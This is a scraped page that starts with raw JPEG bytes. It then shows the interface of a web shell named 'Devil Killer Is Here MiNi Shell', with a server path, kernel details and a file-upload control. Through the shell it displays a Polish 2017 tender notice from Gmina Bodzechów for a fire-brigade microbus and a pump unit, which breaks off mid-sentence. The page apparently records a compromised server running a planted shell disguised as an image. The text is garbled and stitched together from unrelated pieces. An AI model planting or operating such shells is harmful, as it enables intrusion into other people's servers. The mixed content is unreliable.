JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170120/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170120/11740-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bip.bodzechow.wrota-swietokrzyskie.pl' target='_blank'>http://www.bip.bodzechow.wrota-swietokrzyskie.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 11740 - 2017
              z dnia 2017-01-20 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Ostrowiec Świętokrzyski: Zakup samochodu strażackiego i agregatu pompowego dla OSP Bodzechów w celu przeciwdziałania skutkom klęsk żywiołowych oraz usuwania ich skutków
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Europejski Fundusz Rozwoju Regionalnego Działanie 4.1 Przeciwdzałanie skutkom klęsk żywiołowych oraz usuwanie ich skutków osi 4 Dziedzictwo naturane i kulturowe Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2014-2020</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Bodzechów, krajowy numer identyfikacyjny
              29100999800000, ul.
              ul. Mikołaja Reja 
              10,
              27400  
              Ostrowiec Świętokrzyski, woj.
              świętokrzyskie, państwo
              Polska, tel.
              412 653 838, e-mail
              ab@ugb.pl, faks
              412 651 038.
              <br />
              Adres strony internetowej (URL): www.bip.bodzechow.wrota-swietokrzyskie.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.bodzechow.wrota-swietokrzyskie.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />Gmina Bodzechów ul. Mikołaja Reja 10 27-400 Ostrowiec Świętokrzyski</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Zakup samochodu strażackiego i agregatu pompowego dla OSP Bodzechów w celu przeciwdziałania skutkom klęsk żywiołowych oraz usuwania ich skutków
<br /><b>Numer referencyjny: </b>ZP.271.1.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Zakup samochodu strażackiego i agregatu pompowego dla OSP Bodzechów  w celu przeciwdziałania skutkom klęsk żywiołowych oraz usuwania ich skutków, w skład którego wchodzą:
Zadanie 1: Dostawa samochodu strażackiego wraz z wyposażeniem ratującym życie
Zadanie 2: Dostawa agregatu pompowego

Zadanie 1: Dostawa samochodu strażackiego wraz z wyposażeniem ratującym życie
Opis:
Samochód specjalny typu mikrobus, nowy, 9 - osobowy, przeznaczony do działań ratowniczych                          o minimalnych parametrach:
1. spełnia wymagania prawa o ruchu drogowym (ważna homologacja na samochód bazowy),
2. spełnia wymagania dla pojazdu straży pożarnej uprzywilejowanego w ruchu, zgodnie z prawem            o ruchu drogowym,
3. samochód posiadający wydzieloną pełną ścianką część bagażową, ścianka demontowalna,
4. wykonany w nadwoziu samochodu o dopuszczalnej masie całkowitej nie przekraczającej 3500 kg,
5. dopuszczalna ładowność co najmniej 1400 kg,
6. wymiary pojazdu:
a. pojazd o rozstawie osi co najmniej 3400 mm
b. przedział tylni o długości min. 3100 mm
c. wysokość wnętrza co najmniej 1700 mm
7. napęd - silnik wysokoprężny, spełniający normy czystości spalin zgodnie z przepisami ustawy prawo o ruchu drogowym bez konieczności stosowania dodatkowych płynów w układzie spalinowym o mocy co najmniej 120 KM
8. samochód wyposażony w napęd jednej osi  przedniej,
9. układ kierowniczy - ze wspomaganiem,
10. układ hamulcowy - hydrauliczny ze wspomaganiem, wyposażony w układ
ABS, ASR, EBS,
11. ilość miejsc siedzących  9; możliwość szybkiego demontażu tylnych rzędów foteli dla zapewnienia dużej przestrzeni ładunkowej,
12. przynajmniej 2 poduszki powietrzne dla kierowcy i pasażera,
13. ilość drzwi co najmniej 4 (minimum 2 boczne przednie uchylne, 1 boczne przesuwne, 1 tylne)
14. boczne drzwi przesuwne oraz przedział załogowy  przeszklone szybami przyciemnionymi ,
15. klimatyzacja  osobna regulacja przedziału załogi i kabiny kierowcy, 
16. dodatkowe ogrzewanie przedziału załogi,
17. minimum jedna szyba w przedziale załogowym przesuwna,
18. kolorystyka i oznaczenia pojazdu:
a. kolor nadwozia czerwony lub biały
b. oznakowanie pojazdu  zgodne z zarządzeniem nr 8/2008 Komendanta Głównego Państwowej Straży Pożarnej,
19. kabina kierowcy oraz przedział załogowy wyciszone (tapicerka, podsufitka),
20. przedział załogowy oraz przedział ładunkowy wyposażone w zmywalną podłogę (np. trudno ścieralne PCV),
21. należy przewidzieć co najmniej jeden zamykany schowek, zaleca się aby w kabinie kierowcy znajdowały się praktyczne schowki w drzwiach i desce rozdzielczej,
22. dodatkowe wyposażenie samochodu:
a. oświetlenie pojazdu uprzywilejowanego w ruchu: belka sygnałowa + stroboskopy przednie oraz pojedyncza lampa "kogut" koloru niebieskiego z tyłu pojazdu; moc wzmacniacza urządzenia do
nadawania komunikatów głosowych co najmniej 100 W, 3 sygnały modulowane,
 b. zabudowany w kabinie radiotelefon samochodowy analogowo - cyfrowy o następujących parametrach:
- moc min. 25W
- min. 250 kanałów
- częstotliwość 142  174 MHz
- odstęp międzykanałowy 12,5 kHz  
- antena  lambda na sprężynie przykręcana motylkiem z możliwością regulacji (nie sztywna) z kablem 50 Omów i wtykiem BMC.
c. radioodtwarzacz CD z minimum 4 głośnikami, USB
d. bagażnik dachowy z minimum dwoma poprzeczkami do przewozu długich przedmiotów np. drabin pożarniczych
e. drabinka umożliwiająca wejście na dach mocowana z tyłu nadwozia,
f. dwa komplety kół (sezonowych)
g. pełnowymiarowe koło zapasowe
h. centralny zamek ze zdalnym sterowaniem
i. elektrycznie podnoszone szyby kierowcy i pasażera,
j. elektrycznie regulowane i podgrzewane lusterka,
k. gniazdo 12 V w przedziale ładunkowym,
l. dywaniki gumowe w kabinie kierowcy
m. w przedziale ładunkowym zamontowane wieszaki lub poprzeczna belka pod sufitem na 9 kompletów umundurowania,
n. oświetlenie dachu (typu szperacz),
o. markiza (roleta boczna) do busa,
p. zaczep holowniczy, posiadający homologację lub znak bezpieczeństwa, umożliwiający holowanie przyczep również z zaczepem kulowym.
W okresie gwarancji przeglądy  będą wykonywane na koszt ZAMAWIAJĄCEGO w autoryzowanych serwisach
 Czas przystąpienia serwisu do naprawy 72 godz. od zgłoszenia usterki lub zgłoszenia samochodu do przeglądu (bez wliczania dni ustawowo wolnych od pracy)
 Ilość punktów serwisowych na terenie RP wykonujących wszystkie naprawy  min. 1
Wyposażenie ratujące życie:
1.	Defibrylator wraz z wyposażeniem dodatkowym:
-  szczelność: odporność na strumień wody IPX5, zgodnie z IEC60529
- temperatura pracy/gotowości: 0-50 C
- zasilanie: typ 9V DC, 4,2 Ah, dwutlenek litowo-magnezowy, jednorazowa bateria podstawowa, nie wymaga doładowania
2. Zestaw do wyważania drzwi i cięcia pedałów- do zastosowania podczas otwierania metalowych drzwi ze skomplikowanymi zamkami lub drzwi przeciwpożarowych w czasie prowadzenia akcji ratowniczych, do cięcia w ograniczonej przestrzeni:
- cięcie wewnątrz samochodu, np. koła kierownicy, dźwigni zmiany biegów i pedałów
- przecinanie prętów zbrojeniowych i innych materiałów konstrukcyjnych w budynkach
- poręczny i lekki
- charakteryzujący się brakiem iskrzenia (w miejscach zagrożonych wybuchem)
- do otwierania metalowych drzwi przeciwpożarowych
- praktyczna waliza ułatwiająca przechowywanie i transport
Skład zestawu:
- wyważacz do drzwi
- przecinacz pedałów
- pompka ręczna
- wąż
Minimalne parametry techniczne:
- siła cięcia 75 kN
- siła rozpierania 90 kN
- skok 100mm
- rozwarcie ostrzy 40 mm
Wykonawca przekaże użytkownikowi końcowemu dokumenty niezbędne do zarejestrowania samochodu. Samochód wraz z wyposażeniem zostanie dostarczony do siedziby OSP Bodzechów                  (27  420 Bodzechów, ulica Opatowska 13 ).
Zadanie 2: Dostawa agregatu pompowego
Agregat pompowy na przyczepie dwuosiowej z hamulcem najazdowym o minimalnych parametrach technicznych:
1.	wydajność: Q=200 ÷ 700 m3/h 
2.	Średnica króćca ssawnego 300mm, średnica króćca tłocznego 300mm z redukcjami na 2x200mm każdy
3.	Całkowita  wysokość podnoszenia H- 17÷7 m
4.	Manometryczna minimalna wysokość ssania Hmm=6m
5.	silnik spalinowy
6.	moc silnika min. 32 kW
7.	wyposażenie:
- 2 linie ssawne  o średnicy200mm każda składające się razem z  8 szt. węży w odcinkach 2,5m zakończonych szybkozłączkami oraz 2 koszami ssawnymi
 - 2 linie tłoczne o średnicy 200mm składające się z węży  o długości 2x 25 mb zakończone szybkozłączkami 
8.  przyczepa wyposażona w zaczep kulowy z możliwością zamiany na dyszel z regulowana wysokością, przystosowany do haka holowniczego paszczowego (typ 40)
9. pompa w korpusie posiada nasadę W52 typu Storz z zaślepką służącą do zalewania pompy
10. redukcje tłoczne z 200 na 3x110 z nasadami typu Storz oraz zaślepkami- 2 sztuki
Agregat pompowy zostanie dostarczony do siedziby OSP Bodzechów (27  420 Bodzechów, ulica Opatowska 13 ).
<br /><br /><b>II.5) Główny kod CPV: </b>34144210-3<br /><b> Dodatkowe kody CPV:</b>34144213-4,
                33182100-0<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 10/05/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                dot. Zadanie 1: Zamawiający uzna w/w warunek za spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał dostawę przynajmniej jednego samochodu specjalnego typu mikrobus przeznaczonego do działań ratowniczych o wartości min. 80 000,00 zł brutto. 
dot. Zadanie 2: Zamawiający uzna w/w warunek za spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał dostawę przynajmniej jednego agregatu pompowego  o wydajności Q= 200 ÷ 700 m3/h o wartości min. 100 000,00 zł brutto.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy. Powyższe zobowiązanie ma zastosowanie w przypadku jeżeli Wykonawca nie poda w oświadczeniu złożonym wg. wzoru stanowiącego załącznik nr 1 do SIWZ adresu internetowego urzędu lub organu wydającego dokument oraz dokładnych danych referencyjnych dokumentacji Zamawiający w sytuacji gdy wykonawca polega na zdolnościach lub sytuacji innych podmiotów określonych w art. 22 ustawy żąda przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych powyżej 2)Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów o których mowa w pkt1) niniejszego rozdziału, składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w pkt.2) (powyżej), zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce zamieszkania Wykonawcy. W przypadku wątpliwości co do treści dokumentu złożonego przez Wykonawcę, Zamawiający może zwrócić się do właściwych organów odpowiednio kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />wykaz dostaw wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy lub usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu tj.:
dot. Zadania 1: wykonał dostawę przynajmniej jednego samochodu specjalnego typu mikrobus przeznaczony do działań ratowniczych o wartości min. 80 000,00 zł brutto 
dot. Zadania 2: wykonał dostawę przynajmniej jednego agregatu pompowego  o wydajności Q= 200 ÷ 700 m3/h o wartości min. 100 000,00 zł brutto.
b) dokumentów dotyczących podmiotu trzeciego, w celu wykazania spełniania, w zakresie, w jakim Wykonawca powołuje się na jego zasoby, warunków udziału w postępowaniu - jeżeli wykonawca polega na zasobach podmiotu trzeciego.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">W celu potwierdzenia, że oferowany przez Wykonawcę samochód spełnia wszystkie wymagania  określone w SIWZ, Zamawiający żąda:
dot. Zadania 1:  szczegółowego Opisu Przedmiotu Zamówienia dot. samochodu oferowanego przez Wykonawcę oraz  wyposażenia ratującego życie sporządzonego wg wzoru stanowiącego załącznik nr 5 do niniejszej SIWZ, z którego powinno wynikać, że oferowany przez Wykonawcę samochód spełnia wszystkie wymagania Zamawiającego (Wykonawca dodatkowo może do oferty dołączyć również katalogi, opisy lub fotografie wraz z istotnymi parametrami technicznymi oferowanego pojazdu)
dot. Zadania 2:  szczegółowego Opisu Przedmiotu Zamówienia dot. agregatu pompowego oferowanego przez Wykonawcę  sporządzonego wg wzoru stanowiącego załącznik nr 6 do SIWZ, z którego powinno wynikać, że oferowany przez Wykonawcę agregat pompowy spełnia wszystkie wymagania Zamawiającego (Wykonawca dodatkowo może do oferty dołączyć również katalogi, opisy lub fotografie wraz z istotnymi parametrami technicznymi oferowanego agregatu)
</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Każdy Wykonawca w terminie do 3 dni od dnia upublicznienia na stronie internetowej Zamawiającego wykazu złożonych ofert przekazuje Zamawiającemu
